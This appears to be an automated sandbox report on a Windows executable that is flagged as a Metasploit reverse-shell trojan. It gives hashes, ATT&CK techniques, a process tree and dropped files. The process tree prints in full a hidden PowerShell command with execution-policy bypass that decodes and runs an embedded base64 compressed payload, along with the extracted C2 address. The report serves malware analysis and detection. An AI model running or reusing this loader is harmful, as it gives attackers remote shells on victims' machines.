metasploit | 33bc7520b5d44606327e9590686517c2de6c3bf9634cb2d6c8cc66b158211183

General

Target

JaffaCakes118_6626018fbed6bc365a383a18a88bb760.exe
Size

58KB
MD5

6626018fbed6bc365a383a18a88bb760
SHA1

191d0d6dd77e33dd45df742fa2f9c28c0740f837
SHA256

33bc7520b5d44606327e9590686517c2de6c3bf9634cb2d6c8cc66b158211183
SHA512

cb766841bc704807fee25a3e9a4c2ea9fde6c26a34d24402192cc28835306c757873cb53a24c9c2b2e86243510ec8e7508d24fc2f5b67ac45b6ab80528fbf690
SSDEEP

768:ez+VZ1p/ija+1I2UqBg6Q4sNbEMLF3pQ1d+NDwaTk02fxvIvri:HVZfqamsNbDFZQ1d+N8KkTvIO

Score

10^/10

metasploit backdoor discovery execution trojan

Malware Config

Extracted

Family

metasploit

Version

encoder/shikata_ga_nai

Extracted

Family

metasploit

Version

windows/shell_reverse_tcp

C2

192.168.25.164:666

Signatures

MetaSploit
Detected malicious payload which is part of the Metasploit Framework, likely generated with msfvenom or similar.
trojan backdoor metasploit
Metasploit family
metasploit

Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs

Run Powershell and hide display window.

execution

PowerShell

T1059.001

pid	Process
1612	powershell.exe

System Location Discovery: System Language Discovery 1 TTPs 5 IoCs

Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

discovery

System Language Discovery

T1614.001

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	csc.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cvtres.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	JaffaCakes118_6626018fbed6bc365a383a18a88bb760.exe

Suspicious behavior: EnumeratesProcesses 1 IoCs

pid	Process
1612	powershell.exe

Suspicious use of AdjustPrivilegeToken 1 IoCs

description	pid	Process
Token: SeDebugPrivilege	1612	powershell.exe

Suspicious use of WriteProcessMemory 16 IoCs

description	pid	Process	procid_target
PID 828 wrote to memory of 2448	828	JaffaCakes118_6626018fbed6bc365a383a18a88bb760.exe	31
PID 828 wrote to memory of 2448	828	JaffaCakes118_6626018fbed6bc365a383a18a88bb760.exe	31
PID 828 wrote to memory of 2448	828	JaffaCakes118_6626018fbed6bc365a383a18a88bb760.exe	31
PID 828 wrote to memory of 2448	828	JaffaCakes118_6626018fbed6bc365a383a18a88bb760.exe	31
PID 2448 wrote to memory of 1612	2448	cmd.exe	32
PID 2448 wrote to memory of 1612	2448	cmd.exe	32
PID 2448 wrote to memory of 1612	2448	cmd.exe	32
PID 2448 wrote to memory of 1612	2448	cmd.exe	32
PID 1612 wrote to memory of 492	1612	powershell.exe	33
PID 1612 wrote to memory of 492	1612	powershell.exe	33
PID 1612 wrote to memory of 492	1612	powershell.exe	33
PID 1612 wrote to memory of 492	1612	powershell.exe	33
PID 492 wrote to memory of 476	492	csc.exe	34
PID 492 wrote to memory of 476	492	csc.exe	34
PID 492 wrote to memory of 476	492	csc.exe	34
PID 492 wrote to memory of 476	492	csc.exe	34

C:\Users\Admin\AppData\Local\Temp\JaffaCakes118_6626018fbed6bc365a383a18a88bb760.exe
"C:\Users\Admin\AppData\Local\Temp\JaffaCakes118_6626018fbed6bc365a383a18a88bb760.exe"
1⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:828
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\CMADXMJM.bat" "C:\Users\Admin\AppData\Local\Temp\JaffaCakes118_6626018fbed6bc365a383a18a88bb760.exe""
  2⤵
  - System Location Discovery: System Language Discovery
  - Suspicious use of WriteProcessMemory
  PID:2448
- - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    powershell.exe -NoP -NonI -W Hidden -Exec Bypass -Command "Invoke-Expression $(New-Object IO.StreamReader ($(New-Object IO.Compression.DeflateStream ($(New-Object IO.MemoryStream (,$([Convert]::FromBase64String(\"nVVNi+NGEL37VzRGB5uxhpZkfa0Z2E2WwEIIgRmSg/Gh1d3KiMiykeSNZzf579F741IyySXk0h/VXVWvXlV1B1Y9qPfLxf5j2346nk/9uFr+6vvOt0l879p2uT6o86VqG6uG0YzT5K/jdK4+deOPY69+avrxYtoPbXuyq5vst426NN2orrf55TZ/We/+t59ve29G//Q8TU78XG52P2/UX55vq7/5vkn+6f04fLb9+F98H/1x8OPq35bnqJbvF8FpIvKDc+HTy9mrcNKpfP/R103XjM2pU4FV4Q/m6NXy56ZL4qUKu2k3nI31ipLvLp3FzUGFZzMM43N/WQTXh+D07t0bkvVGXyOtMSWv01avd2r/zcvo94dDMCCj+urcdGLzaagMhngaSmw1V5C5chry7TTEGGoMaYFtBV2cVhHsQ1YkkMGdxr0EBymxZJAlb7YePrbwlsGUh7fIToOBrIQBXxE5vHnAgD2Heyl0UwKi8xpWYD7CKoWBHKY0UG0R5Rbbej5IS9GoYN7CUQXdLcxvYbTGKoeMBBaQlXaOAxoOceSAlhjBTF4oy2eGLA4cMDusihSnwGJpimExVAwZ2aWaFWgFQqhJkxNohJEDWkXzpI68pKJLhion+fUIJsaQZEJOWUkGSy+RZwQJyw4y7STeGEZdInRSt8CgsU1ISS6OaDSZ1RhCxoLz8ymQ+lSCjoCe5RgTLu65aOaApZJKRLaWQjKsXRywOstEch4xg1h56rJYYTSmFdaLllPWLhHETkolYwKMRJknQhPLjGSzP3jZM0pWNjDrXEqgJLuxxMs+0lBL4ChnCFiVcyPmOC1wL6sljdzGRAoZq3ibCCo3s5HBUW2lLHwm6FlSpKQixVArGAJkWS4+csj4FDBbGrpmLi6m0TIpCIZtz1KmKfpggBloquHcxlJwJII5KqDGfqMuyangw9OAFr80xQ6tKsm0KYUXS7IBKI4lg3RkEvHLGqIVksigDYBH8FtTw0odMB+kzhSSafa0YXOyuKyEX861kdbio5x7uoYPViyfQz4KEYCz6SIYyI0kjzLmnKlgktlv9MFirdkafIycUPKaZKjxKY0SgctH1c0PAHuQOSenbCE+acwR0+3nt4QPdwkS43q3qE+9WgXNg94FjQpbP20Ge/+9734Zn8NoPUnv7tbqK/6f2we4f/0BD6vgev90mjZJvFrfBc16oybVfdAcNipaq9/V6TKG3aVtd38sgi/8wd583xOWTXDdYMLP9TiafgwfW+/PKnz09tQ5hQ9O6z8B\")))), [IO.Compression.CompressionMode]::Decompress)), [Text.Encoding]::ASCII)).ReadToEnd();"
    3⤵
    - Command and Scripting Interpreter: PowerShell
    - System Location Discovery: System Language Discovery
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of WriteProcessMemory
    PID:1612
  - - C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe
      "C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\nq7u5eun.cmdline"
      4⤵
      System Location Discovery: System Language Discovery
      Suspicious use of WriteProcessMemory
      PID:492
    - - C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe
        
        C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESC572.tmp" "c:\Users\Admin\AppData\Local\Temp\CSCC571.tmp"
        5⤵
        System Location Discovery: System Language Discovery
        
        PID:476

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

1

T1059

PowerShell

1

T1059.001

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

System Location Discovery

1

T1614

System Language Discovery

1

T1614.001

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Temp\CMADXMJM.bat

Filesize
3KB

MD5
239377b2e53b2db771827e0cafb26665

SHA1
f4a69ec16ab20be76181f88e197f3f67fb33d775

SHA256
cbb843c81f55095e5e156ceb7aac8176ba29c07cbf5a2131b2ab2d5f767b6c31

SHA512
128225dbf16edca2d007c831b0c484e12c9248c5b1a9e37e8c7e8af6d358fd259d1fe1b21473bfbbfcfdb3acc961e4962bf3a27fdf9bacac17fe2d9dd46df41a

Download Submit
C:\Users\Admin\AppData\Local\Temp\RESC572.tmp

Filesize
1KB

MD5
e392a202a70222527775fe387480c7d6

SHA1
1bfba681638a8bbd5dded9342e7fb42f56762272

SHA256
881d59cd4be95c793b63dfcc39ef6b9c55ee85eaed7941bb26dafb050082f3ab

SHA512
09cd5f026c189feed272fec0879143c070f7f932edc185ed8262094e2e33e79873dacddcb4e3bcc3e0667eab60dc164811dfff411d1eefcd5cfb34d679710198

Download Submit
C:\Users\Admin\AppData\Local\Temp\nq7u5eun.dll

Filesize
3KB

MD5
a4f254f82eb98a573594e09ea3d3bfee

SHA1
95c5a6650179f39c602fcae9180167d38420f0ea

SHA256
132c9d3fa378d9d6d758ad56be01b9506362623ec3283f821f8a46dbe95d3661

SHA512
22a47705582fd932644b433b8af6292011d6c0b81bed847321d760b206da6a73b43985ca5b08b85c99a19dd04beab3ebf3934aa480bafb99dafe3f5e63aca003

Download Submit
C:\Users\Admin\AppData\Local\Temp\nq7u5eun.pdb

Filesize
7KB

MD5
0afb6b6d0236623a51b8fb4de563049b

SHA1
bee1237adbd024f82781016593698364c8310308

SHA256
0efe981463280275cfe06b2d5c89ae67baad323728649e698cb3ee64873e5c4e

SHA512
ac3c5aa239a7060bb691cfa0e141d63558b909b33530aa17728eb0038d9bc404dffa84f59128dfdf1879b72ab11f8bad0f410760a5383047df7ae531f0a155da

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\CSCC571.tmp

Filesize
652B

MD5
d04971bde90d4a4d1a91ac9c34bfb1cd

SHA1
f0273dff611e28a7e86e8dbff4430780ac5228a0

SHA256
df22861747b2a9ce5e31e622b9b4ea1ada21c8d1f6d38a6caa3d7518080d29e2

SHA512
2b71532e4f0fcf251c2dbd242146bf0f9801907fcc357cc665a2935230b20d0dcd8188683d6be8e97c809d0f5ade8e4407c6d423a4c6f61408c9d1a6d2b5a8ad

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\nq7u5eun.0.cs

Filesize
444B

MD5
e4b9c8483e3e90ab7be541471cd6710c

SHA1
797367ac6d8426f10fa192a27a74e0bc9470b10e

SHA256
a1e90593aeaa26b367a39f2e22cd39ee012d67d831495554cb5c0ee64ef5a2e5

SHA512
02d35cd19a7e609a74ef298b8af2362e91b15ccf54a5cbbe23ec00c7119c2ead2e573c8ac0364e351dbb4450c961868e257299ed5852af16e32d8d4b35be0145

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\nq7u5eun.cmdline

Filesize
309B

MD5
54fa93d5cc9715332452bda3a8eb86c4

SHA1
b6a7f3d7b0877b7496639401b38082430668c4e6

SHA256
52306179952179605fc80bd46eaa7e693a1a04ac33c9825eb68a7fc53241e682

SHA512
a6577fedf357004325626607e3fb8f996c94dbd525e73c3ef96d5abe82b5b18188355084d4d34e7eb84f14867329e96a77228aa55f10260fe39dd4ca947ec10a

Download Submit
memory/828-25-0x0000000000400000-0x0000000000417000-memory.dmp

Filesize
92KB

Download
memory/828-38-0x0000000000400000-0x0000000000417000-memory.dmp

Filesize
92KB

Download
memory/1612-6-0x0000000074560000-0x0000000074B0B000-memory.dmp

Filesize
5.7MB

Download
memory/1612-7-0x0000000074560000-0x0000000074B0B000-memory.dmp

Filesize
5.7MB

Download
memory/1612-5-0x0000000074561000-0x0000000074562000-memory.dmp

Filesize
4KB

Download
memory/1612-23-0x0000000002B30000-0x0000000002B31000-memory.dmp

Filesize
4KB

Download
memory/1612-24-0x0000000074560000-0x0000000074B0B000-memory.dmp

Filesize
5.7MB

Download
memory/1612-36-0x0000000002B30000-0x0000000002B31000-memory.dmp

Filesize
4KB

Download
memory/1612-37-0x0000000074560000-0x0000000074B0B000-memory.dmp

Filesize
5.7MB

Download

Analysis

Sharing

General

Malware Config

Extracted

Extracted

Signatures

Processes

Network

MITRE ATT&CK Enterprise v15

Replay Monitor

Loading Replay Monitor...

Downloads